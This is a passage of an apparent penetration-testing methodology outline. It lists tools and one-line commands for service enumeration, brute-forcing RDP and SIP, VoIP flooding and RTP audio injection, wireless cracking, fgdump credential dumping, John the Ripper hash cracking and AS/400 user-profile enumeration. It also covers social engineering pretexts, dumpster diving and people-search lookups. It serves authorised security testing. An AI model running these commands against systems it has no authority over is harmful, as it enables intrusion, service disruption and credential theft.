13.22.3.2. SQL Injection walkthrough

13.22.3.3. SQL Injection by example

13.22.3.4. Advanced SQL Injection in Oracle databases

13.22.3.5. Blind SQL Injection

13.22.3.6. SQL Cheatsheets

13.22.3.6.1. Untitled

13.23. NFS Port 2049 open

13.23.1. NFS Enumeration

13.23.1.1. showmount -e hostname/ip_address

13.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

13.23.2. NFS Brute Force

13.23.2.1. Interact with NFS share and try to add/delete

13.23.2.2. Exploit and Confuse Unix

13.23.3. Examine Configuration Files

13.23.3.1. /etc/exports

13.23.3.2. /etc/lib/nfs/xtab

13.23.4. nmap nse script

13.23.4.1. nfs-showmount

13.24. Compaq/HP Insight Manager Port 2301,2381open

13.24.1. HP Enumeration

13.24.1.1. Authentication Method

13.24.1.1.1. Host OS Authentication

13.24.1.1.2. Default Authentication

13.24.1.2. Wikto

13.24.1.3. Nstealth

13.24.2. HP Bruteforce

13.24.2.1. Hydra

13.24.2.2. Acunetix

13.24.3. Examine Configuration Files

13.24.3.1. path.properties

13.24.3.2. mx.log

13.24.3.3. CLIClientConfig.cfg

13.24.3.4. database.props

13.24.3.5. pg_hba.conf

13.24.3.6. jboss-service.xml

13.24.3.7. .namazurc

13.25. MySQL port 3306 open

13.25.1. Enumeration

13.25.1.1. nmap -A -n -p3306 <IP Address>

13.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

13.25.1.3. telnet IP_Address 3306

13.25.1.4. use test; select * from test;

13.25.1.5. To check for other DB's -- show databases

13.25.2. Administration

13.25.2.1. MySQL Network Scanner

13.25.2.2. MySQL GUI Tools

13.25.2.3. mysqlshow

13.25.2.4. mysqlbinlog

13.25.3. Manual Checks

13.25.3.1. Default usernames and passwords

13.25.3.1.1. username: root password:

13.25.3.1.2. testing

13.25.3.2. Configuration Files

13.25.3.2.1. Operating System

13.25.3.2.2. Command History

13.25.3.2.3. Log Files

13.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

13.25.3.2.5. MySQL data directory (Location specified in my.cnf)

13.25.3.2.6. SSL Check

13.25.3.3. Privilege Escalation

13.25.3.3.1. Current Level of access

13.25.3.3.2. Access passwords

13.25.3.3.3. Create a new user and grant him privileges

13.25.3.3.4. Break into a shell

13.25.4. SQL injection

13.25.4.1. mysql-miner.pl

13.25.4.1.1. mysql-miner.pl http://target/ expected_string database

13.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

13.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

13.25.5. References.

13.25.5.1. Design Weaknesses

13.25.5.1.1. MySQL running as root

13.25.5.1.2. Exposed publicly on Internet

13.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

13.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

13.26. RDesktop port 3389 open

13.26.1. Rdesktop Enumeration

13.26.1.1. Remote Desktop Connection

13.26.2. Rdestop Bruteforce

13.26.2.1. TSGrinder

13.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

13.26.2.2. Tscrack

13.27. Sybase Port 5000+ open

13.27.1. Sybase Enumeration

13.27.1.1. sybase-version ip_address from NGS

13.27.2. Sybase Vulnerability Assessment

13.27.2.1. Use DBVisualiser

13.27.2.1.1. Sybase Security checksheet

13.27.2.1.2. Manual sql input of previously reported vulnerabilties

13.27.2.2. NGS Squirrel for Sybase

13.28. SIP Port 5060 open

13.28.1. SIP Enumeration

13.28.1.1. netcat

13.28.1.1.1. nc IP_Address Port

13.28.1.2. sipflanker

13.28.1.2.1. python sipflanker.py 192.168.1-254

13.28.1.3. Sipscan

13.28.1.4. smap

13.28.1.4.1. smap IP_Address/Subnet_Mask

13.28.1.4.2. smap -o IP_Address/Subnet_Mask

13.28.1.4.3. smap -l IP_Address

13.28.2. SIP Packet Crafting etc.

13.28.2.1. sipsak

13.28.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

13.28.2.1.2. Options request:- sipsak -vv -s sip:username@domain

13.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

13.28.2.2. siprogue

13.28.3. SIP Vulnerability Scanning/ Brute Force

13.28.3.1. tftp bruteforcer

13.28.3.1.1. Default dictionary file

13.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

13.28.3.2. VoIPaudit

13.28.3.3. SiVuS

13.28.4. Examine Configuration Files

13.28.4.1. SIPDefault.cnf

13.28.4.2. asterisk.conf

13.28.4.3. sip.conf

13.28.4.4. phone.conf

13.28.4.5. sip_notify.conf

13.28.4.6. <Ethernet address>.cfg

13.28.4.7. 000000000000.cfg

13.28.4.8. phone1.cfg

13.28.4.9. sip.cfg etc. etc.

13.29. VNC port 5900^ open

13.29.1. VNC Enumeration

13.29.1.1. Scans

13.29.1.1.1. 5900^ for direct access.5800 for HTTP access.

13.29.2. VNC Brute Force

13.29.2.1. Password Attacks

13.29.2.1.1. Remote

13.29.2.1.2. Local

13.29.3. Exmine Configuration Files

13.29.3.1. .vnc

13.29.3.2. /etc/vnc/config

13.29.3.3. $HOME/.vnc/config

13.29.3.4. /etc/sysconfig/vncservers

13.29.3.5. /etc/vnc.conf

13.30. Tor Port 9001, 9030 open

13.30.1. Tor Node Checker

13.30.1.1. Ip Pages

13.30.1.2. Kewlio.net

13.30.2. nmap NSE script

13.31. Jet Direct 9100 open

13.31.1. hijetta

14. VoIP Security

14.1. Sniffing Tools

14.1.1. AuthTool

14.1.2. Cain & Abel

14.1.3. Etherpeek

14.1.4. NetDude

14.1.5. Oreka

14.1.6. PSIPDump

14.1.7. SIPomatic

14.1.8. SIPv6 Analyzer

14.1.9. UCSniff

14.1.10. VoiPong

14.1.11. VOMIT

14.1.12. Wireshark

14.1.13. WIST - Web Interface for SIP Trace

14.2. Scanning and Enumeration Tools

14.2.1. enumIAX

14.2.2. fping

14.2.3. IAX Enumerator

14.2.4. iWar

14.2.5. Nessus

14.2.6. Nmap

14.2.7. SIP Forum Test Framework (SFTF)

14.2.8. SIPcrack

14.2.9. sipflanker

14.2.9.1. python sipflanker.py 192.168.1-254

14.2.10. SIP-Scan

14.2.11. SIP.Tastic

14.2.12. SIPVicious

14.2.13. SiVuS

14.2.14. SMAP

14.2.14.1. smap IP_Address/Subnet_Mask

14.2.14.2. smap -o IP_Address/Subnet_Mask

14.2.14.3. smap -l IP_Address

14.2.15. snmpwalk

14.2.16. VLANping

14.2.17. VoIPAudit

14.2.18. VoIP GHDB Entries

14.2.19. VoIP Voicemail Database

14.3. Packet Creation and Flooding Tools

14.3.1. H.323 Injection Files

14.3.2. H225regreject

14.3.3. IAXHangup

14.3.4. IAXAuthJack

14.3.5. IAX.Brute

14.3.6. IAXFlooder

14.3.6.1. ./iaxflood sourcename destinationname numpackets

14.3.7. INVITE Flooder

14.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

14.3.8. kphone-ddos

14.3.9. RTP Flooder

14.3.10. rtpbreak

14.3.11. Scapy

14.3.12. Seagull

14.3.13. SIPBomber

14.3.14. SIPNess

14.3.15. SIPp

14.3.16. SIPsak

14.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

14.3.16.2. Options request:- sipsak -vv -s sip:username@domain

14.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

14.3.17. SIP-Send-Fun

14.3.18. SIPVicious

14.3.19. Spitter

14.3.20. TFTP Brute Force

14.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

14.3.21. UDP Flooder

14.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

14.3.22. UDP Flooder (with VLAN Support)

14.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

14.3.23. Voiphopper

14.4. Fuzzing Tools

14.4.1. Asteroid

14.4.2. Codenomicon VoIP Fuzzers

14.4.3. Fuzzy Packet

14.4.4. Mu Security VoIP Fuzzing Platform

14.4.5. ohrwurm RTP Fuzzer

14.4.6. PROTOS H.323 Fuzzer

14.4.7. PROTOS SIP Fuzzer

14.4.8. SIP Forum Test Framework (SFTF)

14.4.9. Sip-Proxy

14.5. Signaling Manipulation Tools

14.5.1. AuthTool

14.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

14.5.2. BYE Teardown

14.5.3. Check Sync Phone Rebooter

14.5.4. RedirectPoison

14.5.5. Registration Adder

14.5.6. Registration Eraser

14.5.7. Registration Hijacker

14.5.8. SIP-Kill

14.5.9. SIP-Proxy-Kill

14.5.10. SIP-RedirectRTP

14.5.11. vnak

14.6. Media Manipulation Tools

14.6.1. RTP InsertSound

14.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.2. RTP MixSound

14.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.3. RTPProxy

14.6.4. RTPInject

14.7. Generic Software Suites

14.7.1. OAT Office Communication Server Tool Assessment

14.7.2. EnableSecurity VOIPPACK

14.7.2.1. Note: - Add-on for Immunity Canvas

14.8. References

14.8.1. URL's

14.8.1.1. Common Vulnerabilities and Exploits (CVE)

14.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

14.8.1.2. Default Passwords

14.8.1.3. Hacking Exposed VoIP

14.8.1.3.1. Tool Pre-requisites

14.8.1.4. VoIPsa

14.8.2. White Papers

14.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

14.8.2.2. An Analysis of VoIP Security Threats and Tools

14.8.2.3. Hacking VoIP Exposed

14.8.2.4. Security testing of SIP implementations

14.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

14.8.2.6. Two attacks against VoIP

14.8.2.7. VoIP Attacks!

14.8.2.8. VoIP Security Audit Program (VSAP)

14.8.3. Spirent ThreatEx

15. Wireless Penetration

15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

15.1.1. Site Map

15.1.1.1. RF Map

15.1.1.1.1. Lines of Sight

15.1.1.1.2. Signal Coverage

15.1.1.2. Physical Map

15.1.1.2.1. Triangulate APs

15.1.1.2.2. Satellite Imagery

15.1.2. Network Map

15.1.2.1. MAC Filter

15.1.2.1.1. Authorised MAC Addresses

15.1.2.1.2. Reaction to Spoofed MAC Addresses

15.1.2.2. Encryption Keys utilised

15.1.2.2.1. WEP

15.1.2.2.2. WPA/PSK

15.1.2.2.3. 802.1x

15.1.2.3. Access Points

15.1.2.3.1. ESSID

15.1.2.3.2. BSSIDs

15.1.2.4. Wireless Clients

15.1.2.4.1. MAC Addresses

15.1.2.4.2. Intercepted Traffic

15.2. SipRogue

15.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

15.4. Wireless Toolkit

15.4.1. Wireless Discovery

15.4.1.1. Aerosol

15.4.1.2. Airfart

15.4.1.3. Aphopper

15.4.1.4. Apradar

15.4.1.5. BAFFLE

15.4.1.6. inSSIDer

15.4.1.7. iWEPPro

15.4.1.8. karma

15.4.1.9. KisMAC-ng

15.4.1.10. Kismet

15.4.1.11. MiniStumbler

15.4.1.12. Netstumbler

15.4.1.13. Vistumbler

15.4.1.14. Wellenreiter

15.4.1.15. Wifi Hopper

15.4.1.16. WirelessMon

15.4.1.17. WiFiFoFum

15.4.2. Packet Capture

15.4.2.1. Airopeek

15.4.2.2. Airpcap

15.4.2.3. Airtraf

15.4.2.4. Apsniff

15.4.2.5. Cain

15.4.2.6. Commview

15.4.2.7. Ettercap

15.4.2.8. Netmon

15.4.2.8.1. nmwifi

15.4.2.9. Wireshark

15.4.3. EAP Attack tools

15.4.3.1. eapmd5pass

15.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

15.4.3.1.2. Untitled

15.4.4. Leap Attack Tools

15.4.4.1. asleap

15.4.4.2. thc leap cracker

15.4.4.3. anwrap

15.4.5. WEP/ WPA Password Attack Tools

15.4.5.1. Airbase

15.4.5.2. Aircrack-ptw

15.4.5.3. Aircrack-ng

15.4.5.4. Airsnort

15.4.5.5. cowpatty

15.4.5.6. FiOS Wireless Key Calculator

15.4.5.7. iWifiHack

15.4.5.8. KisMAC-ng

15.4.5.9. Rainbow Tables

15.4.5.10. wep attack

15.4.5.11. wep crack

15.4.5.12. wzcook

15.4.6. Frame Generation Software

15.4.6.1. Airgobbler

15.4.6.2. airpwn

15.4.6.3. Airsnarf

15.4.6.4. Commview

15.4.6.5. fake ap

15.4.6.6. void 11

15.4.6.7. wifi tap

15.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

15.4.6.8. FreeRADIUS - Wireless Pwnage Edition

15.4.7. Mapping Software

15.4.7.1. Online Mapping

15.4.7.1.1. WIGLE

15.4.7.1.2. Skyhook

15.4.7.2. Tools

15.4.7.2.1. Knsgem

15.4.8. File Format Conversion Tools

15.4.8.1. ns1 recovery and conversion tool

15.4.8.2. warbable

15.4.8.3. warkizniz

15.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

15.4.8.4. ivstools

15.4.9. IDS Tools

15.4.9.1. WIDZ

15.4.9.2. War Scanner

15.4.9.3. Snort-Wireless

15.4.9.4. AirDefense

15.4.9.5. AirMagnet

15.5. WLAN discovery

15.5.1. Unencrypted WLAN

15.5.1.1. Visible SSID

15.5.1.1.1. Sniff for IP range

15.5.1.2. Hidden SSID

15.5.1.2.1. Deauth client

15.5.2. WEP encrypted WLAN

15.5.2.1. Visible SSID

15.5.2.1.1. WEPattack

15.5.2.2. Hidden SSID

15.5.2.2.1. Deauth client

15.5.3. WPA / WPA2 encrypted WLAN

15.5.3.1. Deauth client

15.5.3.1.1. Capture EAPOL handshake

15.5.4. LEAP encrypted WLAN

15.5.4.1. Deauth client

15.5.4.1.1. Break LEAP

15.5.5. 802.1x WLAN

15.5.5.1. Create Rogue Access Point

15.5.5.1.1. Airsnarf

15.5.5.1.2. fake ap

15.5.5.1.3. Hotspotter

15.5.5.1.4. Karma

15.5.5.1.5. Linux rogue AP

15.5.6. Resources

15.5.6.1. URL's

15.5.6.1.1. Wirelessdefence.org

15.5.6.1.2. Russix

15.5.6.1.3. Wardrive.net

15.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

15.5.6.2. White Papers

15.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

15.5.6.2.2. 802.11b Firmware-Level Attacks

15.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

15.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

15.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds

15.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

15.5.6.2.7. Active behavioral fingerprinting of wireless devices

15.5.6.3. Common Vulnerabilities and Exploits (CVE)

15.5.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

16. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

17. http://secunia.com/advisories/search/?search=citrix

18. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

18.1. Untitled

18.1.1. Authoratitive Bodies

18.1.1.1. IANA - Internet Assigned Numbers Authority

18.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

18.1.1.3. NRO - Number Resource Organisation

18.1.1.4. RIR - Regional Internet Registry

18.1.1.4.1. AFRINIC - African Network Information Centre

18.1.1.4.2. APNIC - Asia Pacific Network Information Centre

18.1.1.4.3. ARIN - American Registry for Internet Numbers

18.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

18.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

18.1.2. Websites

18.1.2.1. Central Ops

18.1.2.1.1. Domain Dossier

18.1.2.1.2. Email Dossier

18.1.2.2. DNS Stuff

18.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

18.1.2.3. Fixed Orbit

18.1.2.3.1. Autonomous System lookups and other online tools available.

18.1.2.4. Geektools

18.1.2.5. IP2Location

18.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

18.1.2.6. Kartoo

18.1.2.6.1. Metasearch engine that visually presents its results.

18.1.2.7. MyIPNeighbors.com

18.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

18.1.2.8. My-IP-Neighbors.com

18.1.2.8.1. Excellent site that can be used if the above is down

18.1.2.9. myipneighbors.net

18.1.2.10. Netcraft

18.1.2.10.1. Online search tool allowing queries for host information.

18.1.2.11. Passive DNS Replication

18.1.2.11.1. Finds shared domains based on supplied IP addresses

18.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

18.1.2.12. Robtex

18.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

18.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

18.1.2.13. Traceroute.org

18.1.2.13.1. Website listing a large number links to online traceroute resources.

18.1.2.14. Wayback Machine

18.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

18.1.2.15. Whois.net

18.1.3. Tools

18.1.3.1. Cheops-ng

18.1.3.2. Country whois

18.1.3.3. Domain Research Tool

18.1.3.4. Firefox Plugins

18.1.3.4.1. AS Number

18.1.3.4.2. Shazou

18.1.3.4.3. Firecat Suite

18.1.3.5. Gnetutil

18.1.3.6. Goolag Scanner

18.1.3.7. Greenwich

18.1.3.8. Maltego

18.1.3.9. GTWhois

18.1.3.10. Sam Spade

18.1.3.11. Smart whois

18.1.3.12. SpiderFoot

18.2. Internet Search

18.2.1. General Information

18.2.1.1. Web Investigator

18.2.1.2. Tracesmart

18.2.1.3. Friends Reunited

18.2.1.4. Ebay - profiles etc.

18.2.2. Financial

18.2.2.1. EDGAR - Company information, including real-time filings. US

18.2.2.2. Google Finance - General Finance Portal

18.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

18.2.2.4. Companies House UK

18.2.2.5. Land Registry UK

18.2.3. Phone book/ Electoral Role Information

18.2.3.1. 123people

18.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

18.2.3.2. 192.com

18.2.3.2.1. Electoral Role Search. UK

18.2.3.3. 411

18.2.3.3.1. Online White Pages and Yellow Pages. US

18.2.3.4. Untitled

18.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

18.2.3.5. BT.com. UK

18.2.3.5.1. Residential

18.2.3.5.2. Business

18.2.3.6. Pipl

18.2.3.6.1. Untitled

18.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

18.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

18.2.3.7. Spokeo

18.2.3.7.1. http://www.spokeo.com/user?q=domain_name

18.2.3.7.2. http://www.spokeo.com/user?q=email_address

18.2.3.8. Yasni

18.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

18.2.3.9. Zabasearch

18.2.3.9.1. People Search Engine. US

18.2.4. Generic Web Searching

18.2.4.1. Code Search

18.2.4.2. Forum Entries

18.2.4.3. Google Hacking Database

18.2.4.4. Google

18.2.4.4.1. Email Addresses

18.2.4.4.2. Contact Details

18.2.4.5. Newsgroups/forums

18.2.4.6. Blog Search

18.2.4.6.1. Yammer

18.2.4.6.2. Google Blog Search

18.2.4.6.3. Technorati

18.2.4.6.4. Jaiku

18.2.4.6.5. Present.ly

18.2.4.6.6. Twitter Network Browser

18.2.4.7. Search Engine Comparison/ Aggregator Sites

18.2.4.7.1. Clusty

18.2.4.7.2. Grokker

18.2.4.7.3. Zuula

18.2.4.7.4. Exalead

18.2.4.7.5. Delicious

18.2.5. Metadata Search

18.2.5.1. Untitled

18.2.5.1.1. MetaData Visualisation Sites

18.2.5.1.2. Tools

18.2.5.1.3. Wikipedia Metadata Search

18.2.6. Social/ Business Networks

18.2.6.1. Untitled

18.2.6.1.1. Africa

18.2.6.1.2. Australia

18.2.6.1.3. Belgium

18.2.6.1.4. Holland

18.2.6.1.5. Hungary

18.2.6.1.6. Iran

18.2.6.1.7. Japan

18.2.6.1.8. Korea

18.2.6.1.9. Poland

18.2.6.1.10. Russia

18.2.6.1.11. Sweden

18.2.6.1.12. UK

18.2.6.1.13. US

18.2.6.1.14. Assorted

18.2.7. Resources

18.2.7.1. OSINT

18.2.7.2. International Directory of Search Engines

18.3. DNS Record Retrieval from publically available servers

18.3.1. Types of Information Records

18.3.1.1. SOA Records - Indicates the server that has authority for the domain.

18.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

18.3.1.3. NS Records - List of a host’s or domain’s name server(s).

18.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

18.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

18.3.1.6. SRV Records - Service location record.

18.3.1.7. HINFO Records - Host information record with CPU type and operating system.

18.3.1.8. TXT Records - Generic text record.

18.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

18.3.1.10. RP - Responsible person for the domain.

18.3.2. Database Settings

18.3.2.1. Version.bind

18.3.2.2. Serial

18.3.2.3. Refresh

18.3.2.4. Retry

18.3.2.5. Expiry

18.3.2.6. Minimum

18.3.3. Sub Domains

18.3.4. Internal IP ranges

18.3.4.1. Reverse DNS for IP Range

18.3.5. Zone Transfer

18.4. Social Engineering

18.4.1. Remote

18.4.1.1. Phone

18.4.1.1.1. Scenarios

18.4.1.1.2. Results

18.4.1.1.3. Contact Details

18.4.1.2. Email

18.4.1.2.1. Scenarios

18.4.1.2.2. Software

18.4.1.2.3. Results

18.4.1.2.4. Contact Details

18.4.1.3. Other

18.4.2. Local

18.4.2.1. Personas

18.4.2.1.1. Name

18.4.2.1.2. Phone

18.4.2.1.3. Email

18.4.2.1.4. Business Cards

18.4.2.2. Contact Details

18.4.2.2.1. Name

18.4.2.2.2. Phone number

18.4.2.2.3. Email

18.4.2.2.4. Room number

18.4.2.2.5. Department

18.4.2.2.6. Role

18.4.2.3. Scenarios

18.4.2.3.1. New IT employee

18.4.2.3.2. Fire Inspector

18.4.2.4. Results

18.4.2.5. Maps

18.4.2.5.1. Satalitte Imagery

18.4.2.5.2. Building layouts

18.4.2.6. Other

18.5. Dumpster Diving

18.5.1. Rubbish Bins

18.5.2. Contract Waste Removal

18.5.3. Ebay ex-stock sales i.e. HDD

18.6. Web Site copy

18.6.1. htttrack

18.6.2. teleport pro

18.6.3. Black Widow

19. Password cracking

19.1. Rainbow crack

19.1.1. ophcrack

19.1.2. rainbow tables

19.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

19.2. Ophcrack

19.3. Cain & Abel

19.4. John the Ripper

19.4.1. ./unshadow passwd shadow > file_to_crack

19.4.2. ./john -single file_to_crack

19.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

19.4.4. ./john -show file_to_crack

19.4.5. ./john --incremental:All file_to_crack

19.5. fgdump

19.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

19.6. pwdump6

19.7. medusa

19.8. LCP

19.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

19.9.1. Domain credentials

19.9.2. Sniffing

19.9.3. pwdump import

19.9.4. sam import

19.10. aiocracker

19.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

20. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

20.1. Manual

20.1.1. Patch Levels

20.1.2. Confirmed Vulnerabilities

20.1.2.1. Severe

20.1.2.2. High

20.1.2.3. Medium

20.1.2.4. Low

20.2. Automated

20.2.1. Reports

20.2.2. Vulnerabilities

20.2.2.1. Severe

20.2.2.2. High

20.2.2.3. Medium

20.2.2.4. Low

20.3. Tools

20.3.1. GFI

20.3.2. Nessus (Linux)

20.3.2.1. Nessus (Windows)

20.3.3. NGS Typhon

20.3.4. NGS Squirrel for Oracle

20.3.5. NGS Squirrel for SQL

20.3.6. SARA

20.3.7. MatriXay

20.3.8. BiDiBlah

20.3.9. SSA

20.3.10. Oval Interpreter

20.3.11. Xscan

20.3.12. Security Manager +

20.3.13. Inguma

20.4. Resources

20.4.1. Security Focus

20.4.2. Microsoft Security Bulletin

20.4.3. Common Vulnerabilities and Exploits (CVE)

20.4.4. National Vulnerability Database (NVD)

20.4.5. The Open Source Vulnerability Database (OSVDB)

20.4.5.1. Standalone Database

20.4.5.1.1. Update URL

20.4.6. United States Computer Emergency Response Team (US-CERT)

20.4.7. Computer Emergency Response Team

20.4.8. Mozilla Security Information

20.4.9. SANS

20.4.10. Securiteam

20.4.11. PacketStorm Security

20.4.12. Security Tracker

20.4.13. Secunia

20.4.14. Vulnerabilities.org

20.4.15. ntbugtraq

20.4.16. Wireless Vulnerabilities and Exploits (WVE)

20.5. Blogs

20.5.1. Carnal0wnage

20.5.2. Fsecure Blog

20.5.3. g0ne blog

20.5.4. GNUCitizen

20.5.5. ha.ckers Blog

20.5.6. Jeremiah Grossman Blog

20.5.7. Metasploit

20.5.8. nCircle Blogs

20.5.9. pentest mokney.net

20.5.10. Rational Security

20.5.11. Rise Security

20.5.12. Security Fix Blog

20.5.13. Software Vulnerability Exploitation Blog

20.5.14. Taosecurity Blog

21. AS/400 Auditing

21.1. Remote

21.1.1. Information Gathering

21.1.1.1. Nmap using common iSeries (AS/400) services.

21.1.1.1.1. Unsecured services (Port;name;description)

21.1.1.1.2. Secured services (Port;name;description)

21.1.1.2. NetCat (old school technique)

21.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

21.1.1.3. Banners Grabbing

21.1.1.3.1. Telnet

21.1.1.3.2. FTP

21.1.1.3.3. HTTP Banner

21.1.1.3.4. POP3

21.1.1.3.5. SNMP

21.1.1.3.6. SMTP

21.1.2. Users Enumeration

21.1.2.1. Default AS/400 users accounts

21.1.2.2. Error messages

21.1.2.2.1. Telnet Login errors

21.1.2.2.2. POP3 authentication Errors

21.1.2.3. Qsys symbolic link (if ftp is enabled)

21.1.2.3.1. ftp target | quote stat | quote site namefmt 1

21.1.2.3.2. cd /

21.1.2.3.3. quote site listfmt 1

21.1.2.3.4. mkdir temp

21.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

21.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

21.1.2.3.7. dir /temp/qsys/*.usrprf

21.1.2.4. LDAP

21.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

21.1.2.4.2. Tool to browse LDAP

21.1.3. Exploitation

21.1.3.1. CVE References

21.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

21.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

21.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

21.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

21.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

21.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

21.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

21.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

21.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

21.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

21.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

21.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

21.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

21.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

21.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

21.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

21.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

21.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

21.1.3.2. Access with Work Station Gateway

21.1.3.2.1. http://target:5061/WSG

21.1.3.2.2. Default AS/400 accounts.

21.1.3.3. Network attacks (next release)

21.1.3.3.1. DB2

21.1.3.3.2. QSHELL

21.1.3.3.3. Hijacking Terminals

